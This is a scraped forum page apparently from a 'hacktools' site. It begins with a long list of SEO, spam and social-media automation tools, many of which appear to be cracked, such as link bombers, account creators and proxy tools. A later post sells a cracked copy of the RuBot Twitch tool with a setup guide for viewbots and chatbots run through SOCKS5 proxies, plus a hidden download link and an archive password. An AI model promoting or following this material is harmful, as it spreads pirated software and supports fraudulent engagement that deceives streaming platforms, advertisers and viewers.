1.5.23 Market Samurai 0.92.17 Mass Link Poster Mass Video Blaster 2.16 Maxprog Email Extractor 3.5 Mega Robot Bomber Member Speed 2.0 Micro Cash Machines Micro Niche Finder 5.5.7 Miracle Traffic Bot Movie Site Press 2.0 MyReviewPlugin 5.0 N Niche Finder Mobile 1.0.20.0 Niche Site Builder Ninja Pinner 1.4.1 No Hands SEO 1.7.16.0 P Page Expiration Robot Pro 2.1.5 Pagelines Framework 2.2.5 Paypal Download Manager 6.44 Penguinizer XP PHP MyVideoBlog Pro 3.2.95 PiiBot 1.6 Pin Blaster 1.37 Pin Presser PingAutomatic 2.0 Pingback Optimizer 2.8 PingFM Poster PinMe Script 1.7 PinPal Bot 3.1.0.7 Pintastic 1.0.6 PinZon 1.8 Platinum Hide IP 3.2.2.8 Plus One Profits WP Plugin PopUp Domination 3.0 [BONUS] PopUp Ninja 2.0 Power Lead Snatcher 1.0.0.7 Power SEO Ranker 1.0.4.0 Power Submitter PressBot Pro Affiliate 2.0.2 Profits Theme 1.1.6 Proxy Goblin 2.5.8 Rev1 Proxy Multiply 1.0.0.64 Proxy Server Finder 1.09 Proxy Switcher Pro 5.5 PR Plunder 3 R Rankbook Twitter Friend Suite Pro 3.1 RankBuilder 2.9.93 Rank Builder NEO 1.0.21 Rank Leap PRO 1.0.19 RSS Link Bomber 2.1.14 S SB Bomber 1.2.26 Scrapebox Scheduler Screaming Frog SEO Spider 2.01 [BONUS] SE Sniper 1.5 SecureDL 1.4.2 SendBlaster 2.0.132 Senuke XCr 3.0.42 SenukeX Bio Spinner V2 SEO Article Generator 2.0.1 SEO Elite 4 SEO Link PRO SEO Link Robot 2.1.5.0 SEO PowerSuite Enterprise [BONUS] SEO Smart Links SEO Studio Enterprise 2.04.30 SEOPressor 4.3.09 Share2See 1.4 Sick Submitter 4.019 SliQ Submitter Plus 3.5.0.0 Snagit 11 Social App Creator 2.2 SocialBot 5.0 SocialBacklinker Pro Social Engine 4.2.4 Social Infuse Socrates Theme 3.03 Spinner Pro Squeeze Boss Stealth Keyword Analyzer 2.3.4 Stealth Keyword Digger 1.3 Sublime Twitter Bot 1.0.27 SubscriptionMate 1.2 SuperPress Plugin T The Action Machine 3.0 The Best Spinner 2.9 The Traffic Player Pro The Tweet Tank Theme Revenge Thesis 1.8.4 [BONUS] Traffic Accumulator 1.0.0 Traffic Juicer 1.6.8.0 Traffic Monster Traffic Phoenix 1.6 Traffic Travis Pro 4.1 Tube Digger 2.2.1 Tube Increaser 5 Tube Smasher TubeToolbox 2.13.5.1 Tubenoia TubeSpy Tweet Adder 3.0 Tweet Attacks Account Creator Tweet Attacks Pro 3.4 TweetSpice 1.1.36.0.0 Twitter Blaster Pro 3.01 Twitter Scraper 1.1 U uBot Studio v.3 [BONUS] Ultimate Exit Pop Up Ultimate Niche Finder 1.4.35.29 Ultimate Page Maker Unlimited Sitemap Generator 4.0 V Venom SEO 1.1.5 Video Bot Video Marketing Blaster 1.35 Video Marketing Dominator Pro Video Prospector Pro 1.8.0.2 Video Shadow 1.3 Video Spin Blaster 2.87 VIP Help Desk 3.03 VIP Shopping Cart 4.0 Viral Traffic Maximizer W Web Content Studio Web Harvy 1.5.0.26 Web Traffic Genius Pro 3.6.21 Wicked Article Creator 2.3 WikiAssault 1.0.0.1 Wiki Bomber 1.0.5.21 Wikibot WikiNuke 1.0.7 Win Automation 4.0.0.1256 WishList Member 2.60 WordTwit Pro Unlimited WordPress Pinterest Automatic 1.2.0 WP4FB 2.0 Unlimited WP Ads Back WP Backup Plus WP Cash Plus 2.0 WP Classifieds 6.3.2 WP Clicks 1.2.5 WP Cloaker WP Contact Pro WP Coupon Generator [BONUS] WP eMember 7.4.1 [BONUS] WP FacePages 4.2.0 WP Fan Pro 2.0 WP Graphics Pro WP Lead Gorilla WP Linkizer Elite WP List Catcher WP Local Places 1.3.2 WP ManagerDX WP Member Champ WP Pop Wizard WP Profit Topper WP Pro Local 2 WP Review Stars Plugin WP Robot 3.66 WP Sales Letter 1.1.7 WP SEO Automation WP SEO Domination 1.4 WP SEO Ninja WP ShareMe WP Short Codes Deluxe WP Simplicity WP Snippets Magic WP SnowBall 1.0.6 WP Social Toolbar PRO 1.2 [BONUS] WP Subscribers 1.40 WP Super Popup Pro WP Syndicator WP Tagizer WP Touch Pro 2.70 WP Traffic Ninja WP Traffic Tools 3.8.8.3 WP Turbo 1.3 WP Tweet Bomb 1.6.9.6 WP Twin 2.70 WP Unique 2.7 WP Video Affiliate Pro WP Viral Rater 3.0 WP Whitehat Wizard WP Zon Builder 2.5s WPsBox Pro 3.1.0 WYSIWYG Web Builder 8.5.2 X X-Cart Pro 4.5.2 XFileSharing Pro 1.8 XGen SEO 1.0.71.0 xGramBot 1.0.3.6 Xrumer 5.09 Palladium Y YellaBot 2.4.03 YouBooster Pro YouTubeGet 5.9.11 Z Zenno Poster PRO [Hidden Content]
  49. 2 points
    Thank you for purchasing your own personal software with Wafflez This software is a cracked version of RuBot (Original price: £64, We sell for: £19.99) NOTE: BUILT IN PROXY GRABBER IS CURRENTLY NOT WORKING FOR PROXIES PLEASE CONTACT WAFFLEZ ON DISCORD. Thank you Anyway this is how to get your software to work #-Setup guide Step 1: Open the RuBot Tools.exe Step 2: Click "Twitch" Step 3: From there you can choose to set up chatbots, viewbots, or a proxy grabber (Proxy grabber currently not working) #-Viewbot guide Step 1: For proxy list contact Wafflez or one of our support team on discord Step 5: In the "Viewers section" select what type of proxies your using (SOCKS5) and enter the channel name Step 6: Slide the slider to how many viewers you want to receive (I'd reccomend setting it to 1500 to get as much viewers) Step 7: Watch your viewer count go up! For further info or help please contact either Wafflez or one of our support teams! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  50. 2 points
    [Hidden Content]